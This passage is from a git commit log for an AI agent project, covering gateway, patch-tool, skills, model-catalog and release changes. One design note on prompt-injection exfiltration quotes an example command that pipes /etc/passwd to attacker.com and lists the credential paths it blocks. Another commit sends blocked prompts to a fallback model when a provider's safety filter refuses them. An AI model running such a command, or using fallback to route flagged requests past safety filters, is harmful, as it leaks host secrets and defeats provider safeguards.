<noreply@anthropic.com> * chore(release): map biser@bisko.be -> bisko in AUTHOR_MAP * fix(gateway): drain on Windows `hermes gateway stop` so sessions survive restart (#33798) Sessions now survive `hermes gateway stop` / `restart` on native Windows. Previously the gateway died on schtasks `/End` + os.kill SIGTERM without ever running the drain loop, so the v0.13.0 session-resume feature (#21192) silently broke on Windows: `resume_pending=True` was never written, and the next boot started with a blank conversation history (issue #33778). Root cause is twofold and the reporter only identified half of it: 1. `hermes_cli/gateway_windows.py::stop()` did not write the `planned_stop_marker` before signalling. The reporter caught this. 2. The bigger reason: `asyncio.add_signal_handler` raises NotImplementedError for SIGTERM/SIGINT on Windows, so even if the marker had been written, the gateway's existing SIGTERM handler (which is what calls `runner.stop()` and the `mark_resume_pending` loop) was never invoked. Writing the marker would have been necessary-but-insufficient. The fix has two parts: * gateway/run.py: new `_run_planned_stop_watcher` daemon thread polls for the planned-stop marker file every 0.5s. When the marker appears it `loop.call_soon_threadsafe(shutdown_signal_handler, None)` — the same shutdown path a real SIGTERM would have driven, including the pre-drain `mark_resume_pending` writes (run.py:5977) and graceful drain wait. The existing signal handler already accepts `received_signal=None` and falls through to `consume_planned_stop_marker_for_self()`, so no handler changes needed. Runs on every platform as cheap belt-and-suspenders. * hermes_cli/gateway_windows.py: `stop()` now writes the marker for the running gateway PID and waits up to `agent.restart_drain_timeout` (default 30s) for the PID to exit cleanly. On clean drain, the kill sweep is non-forceful; on timeout, escalates to `kill_gateway_processes(force=True)` which routes to taskkill /T /F per `references/windows-native-support.md`. Validation: * 7 new tests in tests/gateway/test_planned_stop_watcher.py covering: marker→handler dispatch, no-marker idle, already-draining skip, not-yet-running skip, stop_event responsiveness, fire-once semantics, error tolerance. * 8 new tests in tests/hermes_cli/test_gateway_windows.py covering: marker-before-kill ordering, clean-drain skips force-kill, drain-timeout escalates to force=True, no-pid-skips-drain, invalid-pid handling, fast-exit success, timeout failure, marker-write-failure tolerance. * E2E (Linux, detached orphan): write_planned_stop_marker(pid) + `_drain_gateway_pid(pid, 5.0)` returns True in 0.5s after the victim sees the marker and exits. Tested with a double-forked subprocess so the test parent isn't holding it as a zombie. * Targeted: tests/gateway/{restart_drain,restart_resume_pending, signal,signal_format,status,shutdown_forensics,approve_deny_commands, planned_stop_watcher} + tests/hermes_cli/{gateway_windows, gateway_service} → 519/519. What was wrong with the reporter's claim (for future archaeology): they described the symptom as "no `resume_pending=True` written to `sessions.json`" — but Hermes uses `state.db` (SQLite), not `sessions.json`, and `mark_resume_pending` is called regardless of the marker (the marker only affects exit code 0 vs 1 for systemd revival semantics). The real session-loss path is the missing drain on Windows, not a missing marker. Both halves are fixed here. Closes #33778. * fix(tools): unescape common sequences in new_string when escape_normalized matches When the patch tool matches via the escape_normalized strategy, old_string contains literal \t, \n, \r sequences that get unescaped to match real control characters in the file. However, new_string was written as-is, leaving literal backslash sequences in the output. Add _unescape_common_sequences() helper and apply it to new_string when the matching strategy is escape_normalized. This ensures LLM-generated tab/newline sequences become real bytes in the patched file. Fixes #33733 * fix(patch): widen new_string \t/\r unescape to all match strategies (#33733) Extends @liuhao1024's escape-normalized fix so the patch tool also recovers when old_string carries a real tab byte and matches via the `exact` strategy — which is the headline reproduction in the issue and the most common case in practice (LLMs frequently get old_string right because they re-read the file, but still serialize new_string's tabs as two-character `\t`). Instead of gating on the match strategy, decide per-sequence by looking at the *matched region of the file*: only convert `\t` -> tab and `\r` -> CR when the file region we're replacing actually contains the corresponding control byte. That mirrors the region-based heuristic in `_detect_escape_drift` and keeps legitimate writes of the literal two-character string `"\t"` (e.g. patching `sep = "\t"` in Python source) untouched — those files have a backslash+t in the matched region, not a real tab, so new_string passes through verbatim. `\n` is still excluded because newlines serialize correctly through JSON and unescaping would corrupt source escape sequences far more often than help. E2E verified against the live `patch` tool: tab-indented file + literal `\t` in new_string under both `exact` (Variant 1) and `escape_normalized` (Variant 2) strategies now produces real tab bytes; a Python source line containing `sep = "\t"` (legitimate literal backslash-t) survives a patch unchanged. Tests updated to cover both strategies and the legitimate-literal case, and to assert that `\n` is intentionally preserved. Refs #33733 * fix(update): stream + idle-kill `npm run build` so a stalled webui-build can't soft-brick the install (#33803) `hermes update` ran the webui build with `capture_output=True` and no timeout. On low-memory hosts (WSL2's 4 GB default, small VPSes, antivirus stalls) Vite goes silent for minutes; users see a frozen terminal, decide the update is hung, and reboot. The reboot lands *after* `pip install -e .` has already touched the install but *before* the build completes, leaving the `hermes` launcher in place while `hermes_cli` is no longer importable — i.e. `ModuleNotFoundError: No module named 'hermes_cli'` (#33788, same class as #32384). Changes: - New `_run_with_idle_timeout()` helper: streams subprocess output line-by-line (so the user sees Vite progress in real time) and kills the process if no bytes appear on stdout/stderr for 180s. The existing stale-dist fallback (#23817) then serves the previous build instead of failing the update. - `_build_web_ui()` uses the helper for `npm run build` (the actual stall site). `npm install` keeps `subprocess.run` + capture_output to preserve the existing EPERM-retry-on-Windows contract. - Both `cmd_update` call sites print `→ Core update complete. Building dashboard (optional)...` before the webui build. The CLI is fully functional at this point; a webui-build failure only affects `hermes dashboard`. Telegraphing the boundary explicitly stops users from rebooting through the build step. Tests: - `tests/hermes_cli/test_run_with_idle_timeout.py` — 4 tests covering streaming success, nonzero exit, idle-kill, and missing-binary cases. Uses real `subprocess.Popen` on tiny Python scripts; isolated in its own file so per-file canonical-runner parallelism doesn't pair it with the mock-heavy tests. - `tests/hermes_cli/test_web_ui_build.py` — updated existing tests to patch `_run_with_idle_timeout` for the build step in addition to `subprocess.run` for the install step. - `tests/hermes_cli/test_cmd_update.py::test_update_refreshes_repo_and_tui_node_dependencies` — same update. Full suite: `scripts/run_tests.sh tests/hermes_cli/` → 5646 passed, 0 failed. Fixes #33788. * fix(kanban): content-addressed corrupt-DB backup filename Repeated quarantines of an unchanged corrupt kanban.db used to amplify disk usage by N: the gateway dispatcher's 5-minute retry loop, multi- profile fleets sharing one DB, and manual reopen attempts each produced a fresh '.corrupt.<timestamp>.bak' copy of the same bytes. After 10 retries on a 100KB DB you had 11x the disk footprint of duplicate corrupt data. Derive the backup filename from a sha256 of the main DB instead of a timestamp + collision counter. Same bytes → same filename → skip the copy on retries. Different bytes (partial repair, further damage) → different filename → preserve separately. Sidecar (-wal/-shm) backups inherit the same content-addressed name. Inspired by @hanzckernel's PR #33529, simplified down to ~30 LOC: drop the persistent JSON marker file, drop the atomic temp+fsync+rename helper (shutil.copy2 is fine for a quarantine-only path), drop the gateway-side WAL/SHM fingerprint extension (the existing (path, mtime, size) tuple still gives the 5-minute retry semantics it needs), and drop the gateway-side helper extraction. The backup file existing IS the marker; no separate state needed. Test: tests/hermes_cli/test_kanban_db.py::test_repeated_corrupt_open_reuses_single_backup proves 10 retries on the same corrupt bytes produce 1 backup (was 11), and mutating the corrupt bytes produces a second backup with a different fingerprint. Refs #33529 Co-authored-by: hanzckernel <zhicheng.han@mathematik.uni-goettingen.de> * perf(skills-page): lazy-fetch the catalog instead of bundling 34MB into JS (#33809) PR #33748 grew the live skills index from ~2k skills to ~69k, which made the previous build-time bundling strategy untenable: the skills page's JS chunk was about to balloon from ~1MB to ~35MB. Initial page load on mobile became unusable, search lagged on every keystroke against the 68k-item array, and JSON.parse blocked the main thread at startup. Three changes: 1. extract-skills.py writes skills.json + skills-meta.json into website/static/api/ instead of website/src/data/. Static-served by Vercel as /docs/api/skills.json (gzipped on the wire), same CDN that already serves skills-index.json. 2. skills/index.tsx drops the static import and fetches both files in parallel on mount. Loading state shows '…' for the count; failures surface a small error pill instead of blanking the page. 3. Search is debounced 150ms and runs against a precomputed lowercase haystack stamped onto each row at load time. Before: array-join + toLowerCase per row per keystroke on a 68k array. After: single .includes() per row, deferred until typing settles. Validation: | | before | after | |---|---|---| | skills.json location | src/data/ (bundled) | static/api/ (CDN) | | Largest JS chunk | would be ~35MB at 68k skills | 659 KB | | Initial page render | wait for full parse | immediate, fetch async | | Per-keystroke filter | join+lowercase x 68k rows | single includes x 68k rows | | Debounce | none | 150ms | Built locally for both en and zh-Hans locales; the 34MB skills.json now lives in build/api/ and is served separately rather than inlined into the page's bundle. skills.json and skills-meta.json added to .gitignore — they were already build artifacts, but the gitignore only listed skills-index.json before. * fix(gateway): backfill Discord thread context Discord threads where the bot has already participated bypass mention gating by default, but the backfill check was still tied to the mention-needed condition. That meant follow-up thread messages could trigger a response without providing recent thread history to the session. Run history backfill for thread messages whenever backfill is enabled, while keeping DMs skipped and channel mention backfill behavior unchanged. Add a regression test for a known thread follow-up without an explicit mention. Fixes #33666 Co-authored-by: Cursor <cursoragent@cursor.com> * refactor(discord): inline backfill gate and document intent Drop the _needed_mention local variable now that it has only one use, inline its expression as _has_mention_gap, and add a comment explaining the three backfill cases (mention-gated channel, thread, DM skip). Behaviorally identical to the prior commit; cleanup only. Co-authored-by: liuhao1024 <liuhao1024@users.noreply.github.com> * fix(discord): skip backfill for auto-created threads and update test fakes When auto-threading kicked in, the broadened backfill gate ran on the freshly-created thread — but the thread has no prior context to fetch, and the parent-channel reference passed to _fetch_channel_context would have leaked unrelated context (see #31467). Skip backfill when auto_threaded_channel is set. Also teach the _FakeTextChannel / _FakeThreadChannel test doubles to expose a no-op history() async generator so the broadened gate doesn't trip AttributeError → discord.Forbidden (MagicMock) → TypeError in the existing auto-thread tests. Add a regression test that asserts auto-threaded messages do not trigger backfill. * chore(web): remove web_crawl tool + provider crawl plumbing (#33824) The web_crawl_tool() function was an orphan — no model schema registered it, no skill or CLI command called it, and the agent had no way to invoke it. PR #32608 proposed wiring it up as a model-callable tool; we've decided not to expose crawl as a separate capability since web_search + web_extract cover the use cases we want models to have. Removed: - tools/web_tools.py: web_crawl_tool() (~230 LOC) - plugins/web/firecrawl/provider.py: supports_crawl() + crawl() - plugins/web/tavily/provider.py: supports_crawl() + crawl() - plugins/web/xai/provider.py: supports_crawl() override - agent/web_search_provider.py: supports_crawl() + crawl() ABC methods - agent/web_search_registry.py: get_active_crawl_provider() + the 'crawl' branch in _resolve() - agent/display.py: web_crawl tool-progress rendering - hermes_cli/config.py: 'web_crawl' from TAVILY_API_KEY.tools - tools/website_policy.py: stale comment reference - Tests: removed TestWebCrawlTavily class, the two website-policy web_crawl tests, the searxng/ddgs/brave-free crawl-error tests, the integration test_web_crawl method, and the test_unconfigured_crawl_emits_top_level_error test. Trimmed the capability-flag parametrize list and the WebSearchProvider ABC conformance tests. - Docs: trimmed the Crawl column from capability tables in both EN and zh-Hans, updated the developer-guide ABC table. Net: 25 files, +115/-1067. Closes #33762 (the schema-text bug only existed if #32608 landed). Supersedes #32608. * fix(skills-hub): stop ellipsis-truncating the Identifier column (#33810) `hermes skills search` rendered the Identifier column with the default overflow behaviour, so long slugs (notably browse-sh — every browse-sh skill ends in a `-XXXXXX` hash that's part of the identifier) were cut to `browse-sh/weathe…`. Users copied the visible string into `hermes skills install` and got a not-found error because the hash was gone. Set overflow="fold" on the Identifier column in both search tables (`do_search` and the `_resolve_short_name` multi-match table) so long slugs wrap onto a second line instead of getting eaten. Also add a `--json` flag to `hermes skills search` (and the `/skills search` slash variant) for scripting — emits a list of {name, identifier, source, trust_level, description} objects with the full identifier, which is the right shape for copy-paste pipelines too. Closes #33674. * feat(agent): buffer retry/fallback status, surface only on terminal failure (#33816) Users report that the CLI/gateway floods them with confusing retry chatter during transient failures: a single 429 can produce 10+ "Provider/Endpoint/ Retrying in 5s..." lines before the request eventually succeeds. The same firehose hits Telegram, Discord, Slack, etc. via _emit_status. This patch defers all retry/fallback/compression status messages until we know the outcome: - if the turn ultimately succeeds (any path: primary recovers, fallback activates, compression unsticks the request), the buffer is silently dropped — the user sees nothing. - if every retry and fallback exhausts and the turn fails, the buffer is flushed at the terminal-failure return so the user sees the full retry trace alongside the final error. Backend logging (agent.log) is unchanged — every emission site still writes to logger.warning/info, so post-mortem diagnosis is intact. ## What changed run_agent.py: four new methods on AIAgent: _buffer_status(msg) — defer an _emit_status call _buffer_vprint(msg) — defer a _vprint(force=True) line _clear_status_buffer() — drop pending messages on success _flush_status_buffer() — replay pending messages on terminal failure agent/conversation_loop.py: - converted ~30 mid-process emit/vprint sites in the retry, fallback, compression, empty-response, and stream-watchdog paths to the buffered helpers - added _flush_status_buffer() at every terminal-failure return so users still see the trace when it actually matters - added _clear_status_buffer() at the "non-empty assistant content" point (NOT at "API call returned bytes" — empty responses still loop through the empty-retry path and would otherwise lose their trace between iterations) - silenced the two "(´;ω;`) oops, retrying..." / "(╥_╥) error, retrying..." spinner final-frame messages — the spinner now stops cleanly so retries leave no visible residue agent/chat_completion_helpers.py: same conversion for codex TTFB / stale- stream / fallback-activation status messages. agent/stream_diag.py: _emit_stream_drop now buffers instead of emitting directly. ## Tests tests/run_agent/test_retry_status_buffer.py: 7 unit tests covering accumulate→flush, clear-on-success, mixed kinds, empty-buffer no-op, re-buffer after flush, exception swallowing. Updated 3 existing tests that mocked _emit_status to also mock (or use) _buffer_status: - tests/run_agent/test_run_agent.py::test_empty_response_emits_status_for_gateway - tests/run_agent/test_stream_drop_logging.py (2 tests) - tests/agent/test_codex_ttfb_watchdog.py (TTFB hint test) ## Validation Live test: hermes chat -q against an unreachable endpoint with no fallback exhausts retries and prints the full trace at the end. Same flow against a working endpoint prints zero retry chatter. * docs(email): clarify gateway vs Himalaya setup * fix(xai-oauth): accept bare-code manual paste (state=None) (#26923) (#33880) xAI's consent page renders the authorization code in-page rather than redirecting through the 127.0.0.1 callback, so on remote/headless setups (GCP Cloud Shell, Codespaces, container consoles, headless VPS) the only value the user can paste is the opaque code with no `code=`/`state=` query parameters. `_parse_pasted_callback` correctly returns `state=None` for that input, but `_xai_oauth_loopback_login` then validated state unconditionally and raised `xai_state_mismatch`, making the documented bare-code paste path unreachable. PKCE (code_verifier) still binds the token exchange to this client, so the local state-equality check is redundant when there is no state to compare. On the manual-paste path only, substitute the locally generated state when the callback returned none — the rest of the validation chain (code presence, error field, token exchange) is unchanged. The loopback HTTP-server path still requires a matching state (a real browser redirect always carries one). Also: clarify the manual-paste prompt to mention xAI's in-page code rendering so users know pasting the bare code on its own is expected. Root-cause analysis from #26923 comment by @AccursedGalaxy (2026-05-20). Tests ----- * test_xai_loopback_login_manual_paste_bare_code_succeeds — positive end-to-end through the token exchange with state=None. * test_xai_loopback_login_loopback_path_rejects_missing_state — the HTTP-server path still rejects state=None as a regression guard (the bare-code relaxation must NOT widen the loopback path). * Existing test_xai_loopback_login_manual_paste_state_mismatch_raises continues to verify wrong (non-None) state is rejected on manual-paste. Closes #26923. * fix(agent): fallback immediately on provider content-policy blocks (#33883) * fix(agent): fallback immediately on provider content-policy blocks Provider safety-filter refusals (e.g. OpenAI Codex 'flagged for possible cybersecurity risk', OpenAI moderation 'violates our usage policies', Anthropic safety-system rejections, Azure content_filter) are deterministic decisions about a specific prompt. Retrying the same prompt up to api_max_retries times just reproduces the same refusal and burns paid attempts before surfacing the generic 'API failed after 3 retries — <provider message>' to Telegram / cron with no indication that the failure came from the model provider rather than Hermes itself. Classify these as a new FailoverReason.content_policy_blocked (non-retryable, should_fallback=True) and route them through the existing is_client_error path so the loop: - skips the 3x retry backoff - activates a configured fallback model immediately - emits a clear provider-safety message to the user (not the generic 'Non-retryable error (HTTP None)') and surfaces actionable guidance when no fallback is configured (rephrase, narrow context, or set fallback_model in hermes config) - returns a final_response that explicitly tells the user this came from the model provider, so gateway delivery is unambiguous and cron last_status reflects the safety block rather than a vague 'agent reported failure' Patterns are intentionally narrow — verbatim refusal phrasings keyed to specific provider safety pipelines, not generic words like 'policy' or 'violation' that would collide with billing / format / auth errors. Regression guards in test_18028_content_policy_blocked.py verify billing 402s, generic 400s, and OpenRouter account-level provider_policy_blocked remain distinct classifications. Salvaged from #18164 onto current main (file restructure: loop logic moved from run_agent.py to agent/conversation_loop.py, _emit_status → _buffer_status), broadened patterns beyond the original OpenAI Codex cybersecurity case to cover OpenAI moderation, Anthropic safety system, and Azure content_filter; added user-actionable guidance and a clear final_response so cron/gateway surfaces the policy block instead of a generic non-retryable error, and added a regression-guard test module mirroring the is_client_error predicate. Addresses #18028. Co-authored-by: Kuan-Chieh Huang <kchuang1015@users.noreply.github.com> * chore: add kchuang1015 to AUTHOR_MAP --------- Co-authored-by: Kuan-Chieh Huang <kchuang1015@users.noreply.github.com> * feat(openrouter): pass session_id in extra_body for sticky routing OpenRouter supports a session_id field in extra_body that pins multi-turn conversations to the same provider endpoint, enabling prompt cache reuse across turns. The session_id was already threaded through to build_extra_body() but never included in the returned dict. Co-Authored-By: Claude Opus 4 (1M context) <noreply@anthropic.com> * feat: add claude-opus-4.8 and claude-opus-4.8-fast (#34003) Anthropic released Claude Opus 4.8 on 2026-05-27, available on OpenRouter, Anthropic, Amazon Bedrock, and Claude Platform on AWS: - https://openrouter.ai/anthropic/claude-opus-4.8 - https://openrouter.ai/anthropic/claude-opus-4.8-fast The fast-mode variant is a separate model ID (anthropic/claude-opus-4.8-fast) priced at 2x of the base model — a notable improvement over the 6x premium on older Opus generations (4.6/4.7). It is NOT a `speed: "fast"` request parameter like Opus 4.6; Anthropic's native fast-mode beta still only covers Opus 4.6. Changes: hermes_cli/models.py - Add anthropic/claude-opus-4.8 + anthropic/claude-opus-4.8-fast to the OpenRouter fallback snapshot and the Nous Portal curated list (live catalogs surface them automatically when reachable; the fallback list matters when the manifest fetch fails). - Add claude-opus-4-8 to the Anthropic-native picker list. agent/model_metadata.py - Register claude-opus-4-8 / claude-opus-4.8 in DEFAULT_CONTEXT_LENGTHS with 1M tokens (matches 4.6/4.7). agent/anthropic_adapter.py - Extend _XHIGH_EFFORT_SUBSTRINGS, _ADAPTIVE_THINKING_SUBSTRINGS, and _NO_SAMPLING_PARAMS_SUBSTRINGS with "4-8"/"4.8". 4.8 inherits the Opus 4.7 API contract: adaptive thinking only, xhigh effort level supported, sampling parameters (temperature/top_p/top_k) return 400. - Add claude-opus-4-8 to _ANTHROPIC_OUTPUT_LIMITS (128k max output, same as 4.7). Matches by substring so claude-opus-4-8-fast and date-stamped variants resolve correctly. agent/usage_pricing.py - Add anthropic/claude-opus-4-8: $5/$25 per MTok input/output, $0.50 cache read, $6.25 cache write (same as 4.6/4.7). - Add anthropic/claude-opus-4-8-fast: $10/$50 per MTok (2x), $1.00 cache read, $12.50 cache write. Per OpenRouter, the 2x premium is the only differentiator from regular Opus 4.8. - OpenRouter routes still pull pricing from the live /models API, so no static OpenRouter entry is needed. tests/agent/test_model_metadata.py - Extend the Claude 4.6+ context-length tag list with 4.8/4-8. website/static/api/model-catalog.json - Regenerated via `python scripts/build_model_catalog.py` to pick up the new entries in the OpenRouter and Nous Portal fallback lists. E2E verification (isolated sys.path import against the worktree): - _supports_adaptive_thinking, _supports_xhigh_effort, _forbids_sampling_params all return True for claude-opus-4.8 and claude-opus-4.8-fast. - _supports_fast_mode (the `speed: "fast"` request-parameter gate) stays False for 4.8 — fast mode is a separate model ID on OpenRouter, not a parameter Anthropic accepts on the base model. - DEFAULT_CONTEXT_LENGTHS resolves 1M for both notations. - resolve_billing_route + _lookup_official_docs_pricing resolve the correct $5/$25 (regular) and $10/$50 (fast) pricing for both dot-notation and dash-notation inputs. - 4.7 and 4.6 regression: behavior unchanged. Unit tests: 305 passed across tests/agent/test_usage_pricing.py, test_model_metadata.py, tests/hermes_cli/test_model_catalog.py, test_models.py, test_model_validation.py, test_models_dev_preferred_merge.py. * chore: release v0.15.0 (2026.5.28) (#34008) * chore: release v0.15.0 (2026.5.28) The Velocity Release. Run_agent.py refactor (16k→3.8k LOC, -76%), kanban grows into a multi-agent platform (104 PRs), cold-start perf wave continues (-240ms / -47% per-turn function calls / -195ms per tool call), session_search rebuilt (4500x faster, no LLM), promptware defense lands, Bitwarden Secrets Manager integration, two new image_gen providers (Krea 2, FAL plugin port), Nous-approved MCP catalog, OpenHands skill, ntfy as 23rd messaging platform, deep xAI integration round. 15 P0 + 65 P1 closures. 747 PRs, 1,302 commits, 321 contributors. * chore(release): bump acp_registry/agent.json to 0.15.0 (sync with pyproject) * fix(dashboard): auto-reload SPA on stale-token 401 in loopback mode (#33861) The dashboard's loopback auth uses an ephemeral '_SESSION_TOKEN' that rotates on every server restart (hermes update, hermes gateway restart, etc.). A tab kept open across the restart holds the OLD token in window.__HERMES_SESSION_TOKEN__ from the previous HTML render, so every '/api/*' fetch returns '401 Unauthorized' — surfacing in the UI as 'Failed to load Kanban board: 401: Unauthorized', 'Analytics 401', etc. (#24186, #25275). Before this patch the workaround was to manually clear site data or hard-reload — annoying enough that users reported it as a regression even though the token rotation is by design (security property: stolen tokens can't survive a server restart). The HTML response already sets 'Cache-Control: no-store, no-cache, must-revalidate', so a reload reliably picks up the freshly-injected token. fetchJSON now triggers that reload automatically on the first loopback-mode 401, guarded by a sessionStorage flag so a genuine auth bug (where even the new token fails) falls through to throw on the second attempt instead of reload-looping. The flag is cleared on any 2xx so a subsequent server restart in the same tab gets its own reload cycle. Gated mode is unaffected — that path already redirects to login_url via the structured 401 envelope (Phase 6), and the new code is explicitly skipped when window.__HERMES_AUTH_REQUIRED__ is set. Refs #24186, #25275 * docs: tweak v0.15.0 release notes (#34037) * fix(nix): update hermes-web npmDepsHash for bumped @nous-research/ui The web/package-lock.json changed when bumping @nous-research/ui to 0.18.0, so the fetchNpmDeps fixed-output hash in nix/web.nix was stale and the nix build failed. Update it to the hash prefetch-npm-deps computes for the new lockfile. Co-authored-by: Cursor <cursoragent@cursor.com> * fix(skills): pull full skills.sh catalog via sitemap (858 → 19,932) (#34025) The skills.sh source was returning ~858 unique skills from a hardcoded list of 28 popular keyword searches (each capped at 50 results). The real catalog is ~20k — exposed via sitemap-skills-{1,2}.xml linked from the site's sitemap index. Switch the empty-query path in SkillsShSource.search() to walk the sitemap instead of scraping the homepage's curated featured strip. Falls back to the homepage scrape if the sitemap is unreachable. build_skills_index.crawl_skills_sh() now just calls search("", limit=0) instead of running 28 keyword searches — same result in one HTTP round instead of 28. Also handle a httpx + brotlicffi interaction: the per-skill sitemaps are ~900 KB brotli-compressed and the cffi backend's streaming decode chokes on them. Forcing Accept-Encoding to gzip dodges the bug without requiring a brotli library upgrade. E2E against live skills.sh: 19,932 unique skills walked in 0.7s. Tests: 137 pass (+1 new regression test exercising the sitemap path). Floor for skills.sh raised 100 → 10,000 in EXPECTED_FLOORS so a future regression hard-fails the build. * fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022) PR #29523 restricted MEDIA: paths and bare local paths in agent output to files under the Hermes media cache or an operator-allowlisted root, with a 10-minute recency window as a fallback. The intent was to defend against prompt-injection-driven exfiltration of host secrets, but in the default single-user setup the asymmetry doesn't earn its keep: we accept any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...) and the agent already has terminal access — anything that can convince it to emit a MEDIA: tag for /etc/passwd can equally convince it to `cat /etc/passwd | curl attacker.com`. Practical breakage: agents that produced an .md, .pdf, or other artifact more than ~10 minutes ago, or outside the cache allowlist, showed the user a raw filepath in chat instead of the file. Default flipped to denylist-only: • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run} • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud} • macOS Library/Keychains • $HERMES_HOME/{.env, auth.json, credentials} The legacy allowlist+recency-window behavior stays available via opt-in: `gateway.strict: true` in config.yaml (or `HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots where prompt injection from one user shouldn't be able to exfiltrate the host's secrets to that same user. • `gateway/platforms/base.py` — `validate_media_delivery_path()` short-circuits to "return resolved if not under denylist" when strict is off. Strict mode preserves the original cache-then- allowlist-then-recency logic. New `_media_delivery_strict_mode()` reader for `HERMES_MEDIA_DELIVERY_STRICT`. • `hermes_cli/config.py` — `gateway.strict: false` added to DEFAULT_CONFIG; existing keys documented as "only consulted in strict mode." No `_config_version` bump needed (deep-merge picks up the new default for old installs). • `gateway/run.py` — bridges `gateway.strict` → `HERMES_MEDIA_DELIVERY_STRICT` at startup. • `tools/send_message_tool.py` — schema description broadened back to plain "any local path." • Tests — existing strict-path tests pinned to STRICT=1 so they keep exercising the legacy behavior; new `TestMediaDeliveryDefaultMode` with 8 cases covering the public default (stale .md accepted, any extension delivers, credential paths still blocked, strict env-var aliases, filter E2E). Validation: - tests/gateway/test_platform_base.py: 119/119 pass - tests/gateway/test_tts_media_routing.py: 7/7 pass - tests/tools/test_send_message_tool.py: 121/121 pass - tests/hermes_cli/test_kanban_notify.py: 12/12 pass - tests/cron/test_scheduler.py: 120/120 pass - E2E via execute_code with real imports: • stale .md outside allowlist → accepted (default) • same path with STRICT=1 → rejected • $HOME/.ssh/id_rsa → rejected (default) • filter_local_delivery_paths([md, key]) → [md] only • gateway.strict in config.yaml → bridged to env (true=1, false=0) * fix(redact): pass web URLs through unchanged (#34029) * fix(redact): pass web URLs through unchanged Magic-link checkout URLs, OAuth callbacks the agent is meant to follow, and pre-signed share URLs were getting `?token=***` / `?code=***` / `?signature=***` blanket-redacted by parameter NAME, which breaks any skill that has to round-trip a URL through history (the model's tool call arguments get sanitized before persistence — the live call fires with the real URL, but the next turn sees `***`). Joe Rinaldi Johnson hit this with a checkout-acceleration skill that uses magic links in URLs. Drops three call sites from `redact_sensitive_text`: - `_redact_url_query_params` (was redacting `access_token`, `token`, `api_key`, `code`, `signature`, `key`, `auth`, etc.) - `_redact_url_userinfo` (was redacting `https://user:pass@host`) - `_redact_http_request_target_query_params` (was redacting access-log request targets like `"POST /hook?password=... HTTP/1.1"`) The helpers themselves are kept in the module — still importable by anything that wants to opt in explicitly. Still redacted (unchanged): - Vendor-prefix credential shapes (sk-, ghp_, AKIA, gAAAA, etc.) anywhere they appear, including inside URLs — see the `test_known_prefix_inside_url_still_redacted` case. - JWTs (`eyJ...`) - DB connection-string passwords (`postgres://admin:pw@host`) — these are connection strings, not web URLs the agent navigates to. - Authorization headers, ENV assignments, JSON `apiKey`/`token` fields, Telegram bot tokens, private key blocks, Discord mentions, E.164 phone numbers, and form-urlencoded bodies (request bodies, not URLs). Tests: replaces `TestUrlQueryParamRedaction` + `TestUrlUserinfoRedaction` with `TestWebUrlsNotRedacted`, asserting representative URLs (OAuth callback, magic link, S3 pre-signed, websocket, userinfo, access log) pass through unchanged. Adds positive cases proving the prefix and DB connstr nets still fire. 74 redact tests + 10 browser-exfil + 16 PII redaction tests all pass. * test(codex_app_server): drop URL-query assertion from stderr-tail redaction test The test bundled (a) sk-live-* credential-prefix redaction with (b) URL query-param redaction. (a) is still in effect via _PREFIX_RE; (b) was the contract we just removed in the parent commit so the 'querysecret12345' assertion stopped holding. Keep the credential-shape assertion, drop the URL-query one. Send-message tool's local _URL_SECRET_QUERY_RE in tools/send_message_tool.py is independent of agent/redact.py and unchanged — its tests (test_top_level_send_failure_redacts_query_token, test_http_error_redacts_access_token_in_exception_text) still pass. * fix(model picker): unify /model and `hermes model` lists, add disk cache (#33867) * fix(model picker): unify /model and `hermes model` model lists, add disk cache The /model slash picker and `hermes model` were drifting apart. /model read the raw static `OPENROUTER_MODELS` list (31 entries, including 5 that fail at runtime — no tool-call support or absent from live catalog), while `hermes model` ran the same list through the live OpenRouter /v1/models tool-support filter and showed 26 valid entries. Same problem existed for every other authed provider: /model used curated static lists, `hermes model` used live /v1/models. Unifies both surfaces on `provider_model_ids()` and adds a generic disk-cached wrapper so the picker stays snappy. Changes - hermes_cli/models.py: new `cached_provider_model_ids()` — ~/.hermes/provider_models_cache.json, 1h TTL, per-provider entries keyed by credential fingerprint (env vars + OAuth file mtimes). Stale-data-beats-no-data on transient failures. Pair with `clear_provider_models_cache(provider=None)`. - hermes_cli/models.py: `provider_model_ids("nous")` now falls back to the docs-hosted manifest (not the in-repo snapshot) when the live Portal /models call fails — preserves the model_catalog regression guarantee while still going through the unified pathway. - hermes_cli/model_switch.py: `list_authenticated_providers` routes sections 1, 2, and 2b through `cached_provider_model_ids(slug)` with curated fallback when the live fetcher comes up empty. - hermes_cli/model_switch.py: `parse_model_flags` extended to a 4-tuple, parses `--refresh`. - cli.py / gateway/run.py / tui_gateway/server.py: updated unpacking; CLI + gateway wire `--refresh` to `clear_provider_models_cache()`. - hermes_cli/main.py: `hermes model --refresh` argparse flag. - hermes_cli/commands.py: `/model` args_hint advertises `--refresh`. - tests/hermes_cli/test_inventory.py: refresh stale comment. Live PTY parity verification - /model → OpenRouter row: `(26 models)` (was 31, with broken entries) - `hermes model` → OpenRouter: 26 models (unchanged) - The 5 dropped entries: `pareto-code` (no tool-call support), `gemini-3-pro-image-preview` (no tool-call support), `elephant-alpha`, `hy3-preview:free`, `ring-2.6-1t:free` (gone from OpenRouter's live catalog). Live PTY timing - First /model open, empty cache: 4624 ms (full network round trip across every authed provider) - Second /model open, warm cache: 51 ms (90× faster) - `/model --refresh` clears the disk cache and re-fetches. Cache schema (~/.hermes/provider_models_cache.json, ~3 KB): { "anthropic": {"fp": "<sha256:16>", "at": 1748..., "models": [...]}, ... } Targeted tests: tests/hermes_cli/ + gateway model tests + tui_gateway — 5855/5855 pass. * fix(model picker): use blake2b for cache fingerprint to silence CodeQL py/weak-sensitive-data-hashing flagged the sha256 call in _credential_fingerprint() as a high-severity alert because the input includes env var values whose names contain *_API_KEY / *_TOKEN. The hash is used solely as a cache-bust identity — never reversed, never stored, collisions are harmless (worst case: cache miss → live re-fetch). blake2b serves the same purpose and isn't flagged by this rule. Functional behavior identical: 16-hex-char digest, cache hit/miss logic unchanged. Live re-verified — 26 OpenRouter models, warm-cache 78ms. * fix(kanban): SIGTERM on worker must terminate the process (#28181) The single-query signal handler in cli.py raises KeyboardInterrupt on SIGTERM/SIGHUP. For interactive 'hermes chat -q' that unwinds the main thread cleanly. For kanban workers spawned by the dispatcher, the worker process is likely to have a non-daemon thread alive 